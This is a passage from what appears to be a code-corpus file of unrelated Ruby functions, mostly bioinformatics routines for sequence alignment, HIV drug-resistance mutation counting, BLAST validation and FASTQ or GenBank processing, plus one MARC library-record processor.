r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def getFt \n kword = ARGV[1]\n seq = @gb.to_biosequence\n seqoptions = \"\"\n\n for c in 2..ARGV.length-1\n seqoptions += \"#{ARGV[c]},\"\n end\n \n # look through all features\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n if (!ftH[\"gene\"].nil? && ftH[\"gene\"][0].downcase.include?(kword.downcase)) or\n (!ftH[\"product\"].nil? && ftH[\"product\"][0].downcase.include?(kword.downcase)) \n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n position = \"c#{position}\"\n end\n pep = Bio::Sequence.new(fasta.translate)\n gene = ftH[\"gene\"][0] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"][0] if !ftH[\"product\"].nil?\n if seqoptions.downcase.include?(\"pep\") or seqoptions.downcase.include?(\"prot\")\n puts pep.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\", 60)\n else\n dna = Bio::Sequence.auto(fasta)\n puts dna.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\",60)\n end\n end\n end\nend",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def process_records(source, format, marc, test) \n STDOUT.puts \"Processing...\"\n source = resolve_source(source) || source\n # Set encoding based on format or file extension.\n if format == \"oclc\"\n external_encoding = \"cp866\"\n else\n external_encoding = \"UTF-8\"\n end\n extension = \".#{format}\"\n marc_out = OUT + \"kumc_ebooks_\" + source + extension\n mode = test ? \"Test\" : \"Normal\"\n unless @quiet\n STDOUT.puts \"Processing #{format.upcase} from \" + source + \" with Mode: \" + mode\n end\n reader = MARC::Reader.new(marc, :external_encoding => external_encoding, :internal_encoding => \"UTF-8\", :invalid => :replace, :replace => \"\")\n writer = MARC::Writer.new(marc_out)\n logfile = File.open(LOGFILE, 'ab')\n counter = 0\n for record in reader\n # Do record enhancements\n newrecord = add_control_number(record)\n newrecord = add_holding_location(newrecord)\n if source == \"Clinical_Key\"\n newrecord = fix_clinicalkey_links(newrecord)\n end\n newrecord = add_link_prefix(newrecord)\n newrecord = set_link_text(newrecord)\n\n\n # Re-sort the tags in the record after appending fields.\n newrecord.fields.sort_by!{|f| f.tag}\n \n begin\n writer.write(newrecord)\n rescue MARC::Exception => e\n STDERR.puts e.message\n STDERR.puts e.backtrace.inspect\n end \n \n # Log 001 source control number\n logfile.puts record['001'].value\n counter += 1\n unless @quiet\n STDOUT.puts counter if (counter.modulo(100)).zero?\n end\n end\n writer.close\n logfile.close\n unless @quiet\n\t\tSTDOUT.puts counter.to_s + \" MARC records written to\"\n\t\tSTDOUT.puts marc_out\n\t\tSTDOUT.puts \"Source Control Numbers (001) logged to #{LOGFILE}\"\n end\nend",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def find_probes(indexed_bam_file, contig_names_positions_directions, kmer, path_to_cny_unified_seq_names_file)\n # need to check the sequence of the aligned read is the same as what is in the cny_unified_seq_names_file\n end",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def buildSampeCommand(read1File, read2File, read1Seq, read2Seq)\n puts \"BWA command\"\n puts @bwaPath\n puts @reference\n puts read1File + \" \" + read2File\n puts read1Seq + \" \" + read2Seq\n puts @samFileName\n cmd = \"time \" + @bwaPath + \" sampe -P \" + \n \" -r \" + buildRGString() + \" \" + @reference + \" \" +\n read1File + \" \" + read2File + \" \" + read1Seq + \" \" + read2Seq +\n \" > \" + @samFileName.to_s\n puts cmd\n return cmd\n end",
"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def muscle_sequence2(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n aln_ref = fasta_to_hash(temp_aln)[\">ref\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return [aln_ref, aln_seq]\nend",
"def traceback(i, j, tn) \n alignment = [\"\", \"\"]\n \n loop do\n t = @ts[tn][1]\n \n # Are we at the end?\n return [alignment] if i == 0 || j == 0\n # If performing a local alignment, has the score dropped below 0?\n return [alignment] if !@align_globally && @ts[tn][0][i][j] <= 0\n \n # Insert as appropriate.\n if t[i][j][0][0] == i - 1\n alignment[0].insert(0, @a[i - 1])\n else\n alignment[0].insert(0, '_')\n end\n if t[i][j][0][1] == j - 1\n alignment[1].insert(0, @b[j - 1])\n else\n alignment[1].insert(0, '_')\n end\n \n # During local alignment, you must implement the following simplification. \n # If you trace back to a cell that contains pointers to a zero in the M \n # matrix and a pointer to a zero in the Ix or Iy matrix, you should only \n # follow the pointer to the zero in the M matrix and terminate your \n # traceback there only. This will prevent you from having alignments \n # that are right-sided substrings.\n \n # If there are multiple possible traceback paths originating in this cell,\n # recurse and follow them individually.\n if t[i][j].size > 1\n # If we are tracing back to a cell with a 0 in the M matrix, we ignore\n # other possible tracebacks.\n if t[i][j].any? {|c| c[2] == :m && @m[c[0]][c[1]] == 0}\n tracebacks = t[i][j].select {|c| c[2] == :m}\n else\n tracebacks = t[i][j]\n end\n \n subalignments = []\n tracebacks.each do |cell|\n traceback(cell[0], cell[1], cell[2]).each do |subalignment|\n subalignments << subalignment\n end\n end\n return subalignments.map do |subalignment|\n [\n subalignment[0] + alignment[0],\n subalignment[1] + alignment[1]\n ]\n end\n end\n \n i, j, tn = t[i][j][0]\n end\n end",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end",
"def run_score\n filename = self.generate_fasta_alignment_file\n string = \"./lib/score_mac #{filename} temp_data/#{self.alignment_name}_res.txt temp_data/#{self.alignment_name}_dif.txt temp_data/#{self.alignment_name}_alignments.txt\"\n puts string\n if system(string)\n \n end\n end",
"def initialize(seq_name,seq_fasta,seq_qual, seq_comment = '')\n super\n\n @actions = []\n @seq_fasta_orig = seq_fasta\n @seq_fasta = seq_fasta\n \n @seq_qual_orig = seq_qual\n @seq_qual = seq_qual \n \n @insert_start = 0\n @insert_end = seq_fasta.length-1 \n \n @stats={}\n @comments=[]\n \n @file_tags=[]\n \n # for paired ends\n @order_in_tuple=0\n @tuple_id=0\n @tuple_size=0\n @file_tag_tuple_priority=0\n \n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def parse_to_file()\n i = 0\n str_n = \"\"\n\n # generating string with 50 N's\n while i<50\n str_n = \"#{str_n}N\"\n i += 1\n end\n\n seq1 = \"\"\n seq2 = \"\"\n\n line1 = @f1.readline().chomp\n line2 = @f2.readline().chomp\n\n tmp1 = line1.split(\" \")\n tmp2 = line2.split(\" \")\n\n header = \"#{tmp1[0]}::#{tmp2[0]}\"\n\n while !@f2.eof?()\n\n line2 = @f2.readline().chomp\n line1 = @f1.readline().chomp\n\n unless line1.include?('>')\n seq1 = seq1 + \"#{line1}\"\n seq2 = seq2 + \"#{line2}\"\n\n else\n\n seq = seq1 + str_n + seq2\n seq1 = \"\"\n seq2 = \"\"\n str = \"#{header}\\n#{seq}\"\n @out.write(str+\"\\n\")\n\n tmp1 = line1.split(\" \")\n tmp2 = line2.split(\" \")\n\n header = \"#{tmp1[0]}::#{tmp2[0]}\"\n\n end\n end\n @out.write(header+\"\\n\"+seq1+str_n+seq2+\"\\n\")\n end",
"def test_project_from_assembly_to_contigs_with_strand\n # This chromosomal region is covered by 4 contigs and 3 gaps\n # One of the contigs are on the reverse strand.\n assert_equal(7, @target_slices_contigs_with_strand.length)\n assert_equal('contig:Btau_4.0:AAFC03028964:90:9214:1', @target_slices_contigs_with_strand[0].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[1].class)\n assert_equal('contig:Btau_4.0:AAFC03028959:1:1746:-1', @target_slices_contigs_with_strand[2].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[3].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand[4].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[5].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:35:1', @target_slices_contigs_with_strand[6].display_name)\n end",
"def aligned_sequence(start=0,stop = nil,noindent=false) \n self._get_aligned_sequence_from_original_sequence_and_cigar_line\n #seq = AlignSeq.new(self.get_slice.seq,self.cigar_line,start,stop).align\n #return Bio::FastaFormat.new(Bio::Sequence::NA.new(seq).to_fasta(\"#{self.find_organism}\"))\n end",
"def run_seq(test=false)\n if @opts[:gtpath].nil?\\\n || !File.exist?(@opts[:gtpath])\\\n || !File.executable?(@opts[:gtpath]) then\n raise \"gt binary not found or executable: #{@opts[:gtpath]}\"\n end\n each_seq do |nr, chr, arglist, chr_cfg|\n if test then\n run \"#{@opts[:gtpath]} #{arglist.join(\" \")}\", :maxtime => 500\n else\n STDERR.puts \"Running #{@job}: seq '#{nr}'\"\n success = Kernel.system(\"#{@opts[:gtpath]} #{arglist.join(\" \")}\")\n end\n if success or test then\n yield nr, chr[:resultfile], chr[:innerfile], \\\n chr[:gff3file], chr[:fastafile]\n else\n raise \"canceled command: #{@opts[:gtpath]} #{arglist.join(\" \")}\"\n end\n end\n end",
"def merge_pairwise(aligns)\n ps = aligns.map do |align| \n seqs = []\n align.each do |bioseq|\n seqs << bioseq.to_s\n end\n seqs\n end\n template = []\n #m,x,n\n x = 2\n ftemp = ps.first.first\n nmax = ps.map {|pair| pair.first.size }.max\n mmax = ps.size\n mar = (0...mmax).to_a\n others = mar.map { [] }\n ns = mar.map { 0 }\n tn = 0\n on = 0\n (0...nmax).each do |n|\n (t_dsh, t_no_dsh) = mar.partition do |m| \n # this is RUBY 1.8 ONLY!!\n ps[m][0][ns[m]] == 45 # '-' is ascii 45\n end\n\n # if a template has a dash, all other off-templates need a dash\n if t_dsh.size > 0\n template[tn] = 45\n t_no_dsh.each do |m|\n # don't update these guys counter\n others[m][tn] = 45\n end\n t_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n ns[m] += 1\n end\n else # no dashes in the template\n t_no_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n end\n template[tn] = ps[0][0][ns[0]]\n ns.map!{|v| v+1 } \n end\n tn += 1\n end\n [cs_to_s(template), others.map! {|ar| cs_to_s(ar) } ]\n end",
"def genomic_sequence\n genome_id = params[:genome][:id]\n reference_id = params[:reference]\n strand = params[:strand].presence || '+'\n\n ref = Reference.find(:first, :conditions => {:name => reference_id, :genome_id => genome_id})\n\n if ref.present?\n seq = Bio::Sequence::NA.new(\"#{ref.sequence.sequence.to_s}\")\n start = params[:start].presence || 1\n stop = params[:end].presence || seq.length\n @subseq = seq.subseq(start.to_i, stop.to_i)\n @subseq = @subseq.reverse_complement if strand == '-'\n end\n\n id = \"#{ref.name} #{start}..#{stop} #{strand}\"\n render :text => @subseq.to_fasta(id, 60), :content_type => 'text/plain'\n end",
"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def identify_clusters\n raise ArgumentError, 'Missing BLAT alignment file.' unless @alignment_file\n \n # Pull out all of the hits clustered by the query into an array\n puts \"Reading alignment file...\" if @verbose\n query_hits = []\n IO::BLASTFormat.open(@alignment_file) do |f|\n f.each_query do |query, hits| \n query_hits << hits.select { |hit| hit.e_value <= @e_value }\n end\n end\n \n # Create a status bar to monitor thread process\n pbar = ProgressBar.new(\"Converting Hits\", query_hits.size, STDOUT) if @verbose\n \n # Thread the creation of the entries from the hits\n entries = Utilities::Threader.thread(query_hits, threads: @threads) do |thread_query_hits|\n thread_query_hits.map do |hits|\n pbar.inc if @verbose\n \n # Cluster the hits\n clusters = Alignment::Aligner.cluster_hits(hits, cluster_on: :subject)\n \n # Convert the clusters to entries\n clusters.map { |clustered_hits| create_feature(clustered_hits) }\n end\n end.flatten\n\n # Write the file\n puts \"Writing entries to file...\" if @verbose\n @output_file ||= \"#{@alignment_file}.gff3\"\n IO::GFFFormat.open(@output_file, mode: 'w') do |f|\n f.puts_header\n f.puts(entries, progress_bar: true, id_prefix: @id_prefix)\n end\n \n @output_file\n end",
"def do_ild(block1, block2)\n\n total_length = block1[0][:seq].length() + block2[0][:seq].length()\n ildstring = \"\"\n ildstring << \"nstates prot;\\n\"\n ildstring << \"xread\\n\"\n ildstring << \"#{total_length} 49\\n\"\n ildstring << \"\\n\"\n ildstring << \"&[prot]\\n\"\n block1.each { |b1| ildstring << \"#{b1[:genus]} #{b1[:seq]}\\n\" }\n ildstring << \"\\n\"\n ildstring << \"&[prot]\\n\"\n block2.each { |b2| ildstring << \"#{b2[:genus]} #{b2[:seq]}\\n\" }\n\n ildfile = Tempfile.new(['ildinput','.tnt'])\n File.open(ildfile.path,'w') { |f| f.write(ildstring) }\n `sequences/aligned/tnt.command mxram 2000, sect:slack 35, p #{ildfile.path}, ild, zzz`\n puts \"p-value?\"\n pval = gets.chomp()\n return pval\n\nend",
"def validation_submission(params)\n\n possible_errors = Array.new\n\n aa_seq_array = is_sequence_empty(params[:aa_sequence], params[:aa_fasta])\n puts \"aa_seq_array => #{aa_seq_array}\"\n # if user submit more than 20 sequence at time, return error immediately\n if !aa_seq_array.nil? and aa_seq_array.length > 20\n possible_errors << \"You submitted more than 20 amino acid sequences. While, we only accept 20 amino acid sequences or less per submission.\"\n return possible_errors\n end\n\n nt_seq_array = is_sequence_empty(params[:nt_sequence], params[:nt_fasta])\n puts \"nt_seq_array => #{nt_seq_array}\"\n if !nt_seq_array.nil? and nt_seq_array.length > 20\n possible_errors << \"You submitted more than 20 nucleotide sequences. While, we only accept 20 nucleotide sequences or less per submission.\"\n return possible_errors\n end\n\n\n if aa_seq_array.nil? or nt_seq_array.nil?\n possible_errors << \"Either your amino acid sequence or nucleotide sequence are empty\"\n return possible_errors\n end\n\n # Check aa sequence \n aa_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n aa_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n aa_sequence_definition = parse_definition(query.definition)\n\n aa_sequence = validate_seq(query.to_seq.seq,\"aa\") # fail return nil; success return 0\n # puts \"validation aa_sequence => #{aa_sequence}\"\n if aa_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if aa_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !aa_sequence_definition.nil? and !aa_sequence.nil?\n aa_sequence_hash[aa_sequence_definition[0]] = query.to_seq.seq\n\n header_array << aa_sequence_definition[0].strip\n accession_no_array << aa_sequence_definition[1].strip\n end\n \n end\n \n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following amino acid sequences are not following our submission rules\\n\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed amino acid sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n\n return possible_errors\n\n end\n\n # check uniqueness of header\n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n # check if the accession number is validate or not\n # we only check the correctness of aa accession number; not gene; since we only care one accession number\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"aa\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have invalid accession number from NCBI. Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n ########################################################################################\n # Check nt sequence\n nt_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n nt_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n nt_sequence_definition = parse_definition(query.definition)\n nt_sequence = validate_seq(query.to_seq.seq,\"nt\")\n \n # puts \"validation nt_sequence => #{nt_sequence}\"\n if nt_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if nt_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !nt_sequence_definition.nil? and !nt_sequence.nil?\n nt_sequence_hash[nt_sequence_definition[0]] = query.to_seq.seq\n\n header_array << nt_sequence_definition[0].strip\n accession_no_array << nt_sequence_definition[1].strip\n end\n end\n\n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following nucleotide sequences are not following our submission rules\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed nucleotide sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n return possible_errors\n end\n \n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n \n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"nt\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have invalid accession number from NCBI. Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n\n\n # check missing sequence\n missing_aa_sequence, missing_nt_sequence = check_matchness(aa_sequence_hash,nt_sequence_hash)\n # puts \"missing_aa_sequence => #{missing_aa_sequence}\"\n # puts \"missing_nt_sequence => #{missing_nt_sequence}\"\n missing_seq_string = \"\"\n if missing_aa_sequence.length > 0\n missing_seq_string += \"You are missing following amino acid sequence based on your nucleotide sequence:\\n\"\n missing_aa_sequence.each do |aa_seq_name|\n missing_seq_string += \"#{aa_seq_name}\\n\"\n end\n end\n\n if missing_nt_sequence.length > 0\n missing_seq_string += \"You are missing following nucleotide sequence based on your amino acid sequence:\\n\"\n missing_nt_sequence.each do |nt_seq_name|\n missing_seq_string += \"#{nt_seq_name}\\n\"\n end\n end\n\n if missing_seq_string.length > 0\n possible_errors << missing_seq_string\n end\n\n\n\n # if error, return error\n # else, return aa_array and nt_array \n if possible_errors.length > 0\n return possible_errors\n else\n aa_nt_array = Hash.new\n aa_nt_array[\"aa\"] = aa_seq_array\n aa_nt_array[\"nt\"] = nt_seq_array\n return aa_nt_array\n end\n\n end",
"def find_replicates(params)\n unless ( params[:geoid_string].nil? ^ params[:geoid_file].nil?) then\n fr_puts \"Received both a :geoid_string and :geoid_file parameter--exactly one is required! Aborting!\"\n throw :needs_exactly_one_geoid_string_or_file\n end\n @batchmode = ! params[:geoid_file].nil?\n # If running in batch, set up the file to get geoids from\n if @batchmode then\n f = File.new(params[:geoid_file])\n else\n f = [params[:geoid_string]]\n end \n output_basedir = Dir.new(params[:output_dir])\n # This ought to be a constant\n no_db_commits = params[:no_db_commits]\n @calling_command = params[:calling_command]\n\n all_infos = [] # All info hashs discovered \n # Only save list of marshalled infos if in batchmode\n marshal_list = File.new(File.join(output_basedir.path, \"marshal_list.txt\"), \"w\") if @batchmode\n \n # For each line in the file (or the single array entry)\n # figure out what the geoids ought to be and stick them in a hash\n f.each { |line|\n line.chomp!\n (pid, gse, gsms, target_column, sdrf) = line.split(/\\t/)\n gsms = gsms.split(/,/)\n \n info = {} # Hash containing calculated geoid information\n info[:pid] = pid\n\n header = parse_sdrf(sdrf)\n s = header.reverse\n\n fr_puts \"modencode_#{pid} has #{gsms.size.inspect} GSMs\" \n fr_puts \"and we have #{header[0].rows.inspect} rows\"\n\n if gsms.size != header[0].rows then\n raise Exception.new(\"Must supply as many GSMS as rows! SDRF has #{header[0].rows} rows, but received #{gsms.size} GSMS.\")\n 